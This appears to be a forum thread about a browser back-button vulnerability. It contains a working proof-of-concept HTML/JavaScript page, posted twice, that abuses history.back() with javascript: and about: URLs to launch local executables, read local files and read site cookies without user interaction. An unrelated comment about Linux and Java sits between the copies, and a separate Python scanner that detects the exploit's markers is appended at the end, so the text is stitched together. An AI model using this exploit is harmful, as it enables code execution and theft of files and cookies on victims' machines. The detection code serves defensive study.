This is a major one,, user interaction not needed
on Don't Hit That Back Button
Score: 5, Informative
The flaw can be exploited *without* user interaction,, use about: and use a body-onload javascript to execute the back button,, poc html page is attached. u know what this means:P.
----cut here---
Press link and then the backbutton to trigger script.
Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)
Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)
Read c:\test.txt (needs to be created)
Read Google cookie
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "about: ";
function execFile(file){
alert (badUrl);
s = '';
backBug(badUrl,s);
}
function readFile(file){
s = '';
backBug(badUrl,s);
}
function readCookie(url){
s = 'alert(document.cookie);close();';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else 'location=\""+url
s+= "\";document.title=\""+page+"\";';";
location = s;
}
Two things,,
Why did you try Linux? and why did u ever try Java and .Net? Both were significantly newer platforms during their time, and there did exist competitive technologies which were in existence for a long time. The point is to let the project mature and see what they can do, until then no one is asking you to jump.
Sorry, forgot the extrans. Correct page attached.
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/calc.exe')"> Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/winnt/system32/calc.exe')"> Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')"> Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')"> Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "about:<html><body onload=javascript:history.back() ><form><input type=button onclick=javascript:history.back()> </form></body></html>";
function execFile(file){
alert (badUrl);
s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();< "+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")' )";
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script> ';";
location = s;
}
</script>
</html>
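A defender-side companion, added here as an example and not the poster's code or anything attached in the thread: a small scanner that flags the markers this PoC depends on (javascript: and about: URLs in links, object/iframe elements pointing at file:/// paths, event handlers that force history.back(), and inline script that builds such a URL) so a proxy, mail gateway or page-audit job can spot content of this shape. The sample documents, category names, regexes and the two-category threshold are my own constructions.

```python
import re
from html.parser import HTMLParser

# Detection heuristics for the markers the posted PoC relies on. The regexes,
# category names and threshold below are my own choices, not from the thread.
SCHEME_RE = re.compile(r"^\s*(?:javascript|about)\s*:", re.IGNORECASE)  # script-scheme URLs in links
LOCAL_FILE_RE = re.compile(r"^\s*file:", re.IGNORECASE)                 # file:/// targets
BACK_RE = re.compile(r"history\.back\s*\(", re.IGNORECASE)              # forced back-navigation


class BackButtonPoCScanner(HTMLParser):
    """Collects (tag, attribute, category) findings for:
    - href/src/codebase attributes whose value is a javascript: or about: URL
    - <object>/<iframe> elements that point at a local file:/// path
    - event handlers (onload/onclick/...) that call history.back()
    - inline <script> text that builds a javascript:/about: URL and calls history.back()
    """

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_depth = 0
        self._script_text = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script_depth += 1
        for name, value in attrs:
            if value is None:
                continue
            if name in ("href", "src", "codebase") and SCHEME_RE.match(value):
                self.findings.append((tag, name, "script-scheme-url"))
            if tag in ("object", "iframe") and name in ("src", "codebase") and LOCAL_FILE_RE.match(value):
                self.findings.append((tag, name, "local-file-reference"))
            if name.startswith("on") and BACK_RE.search(value):
                self.findings.append((tag, name, "history-back-in-handler"))

    def handle_data(self, data):
        # script bodies may arrive in several chunks; buffer and evaluate at </script>
        if self._script_depth:
            self._script_text.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_depth:
            self._script_depth -= 1
            text = "".join(self._script_text)
            self._script_text = []
            if re.search(r"(?:javascript|about)\s*:", text, re.IGNORECASE) and BACK_RE.search(text):
                self.findings.append(("script", "-", "script-url-with-history-back"))


def scan(html):
    """Return the list of findings for one HTML document."""
    parser = BackButtonPoCScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def is_suspicious(html, min_categories=2):
    """Flag a document when at least min_categories distinct markers co-occur;
    a lone javascript: link is common on legitimate pages, the combination is not."""
    return len({category for _, _, category in scan(html)}) >= min_categories


# Constructed samples (not the attachment from the thread): one ordinary page,
# one carrying the same kind of markers as the PoC, one with only the script part.
BENIGN = ('<html><body><a href="https://example.com/">home</a>'
          '<img src="/logo.png" onload="done()"></body></html>')
SUSPECT = ('<html><body onload=javascript:history.back()>'
           '<a href="javascript:execFile(\'file:///c:/winnt/system32/calc.exe\')">run</a>'
           '<object classid=CLSID:11111111-1111-1111-1111-111111111111 '
           'CODEBASE=file:///c:/winnt/system32/calc.exe></object>'
           '<iframe name=i src=file:///c:/test.txt style=display:none '
           'onload=alert(i.document.body.innerText)></iframe></body></html>')
SCRIPT_ONLY = ('<script>badUrl = "about:<html><body onload=javascript:history.back()>'
               '</body></html>";</script>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT), ("script-only", SCRIPT_ONLY)):
        print(label, is_suspicious(doc), scan(doc))
```

The threshold is the tuning knob: the script-only sample yields a single category and is not flagged at the default of two, so a deployment that sees many `about:`-based pages may want to lower it or weight that category on its own.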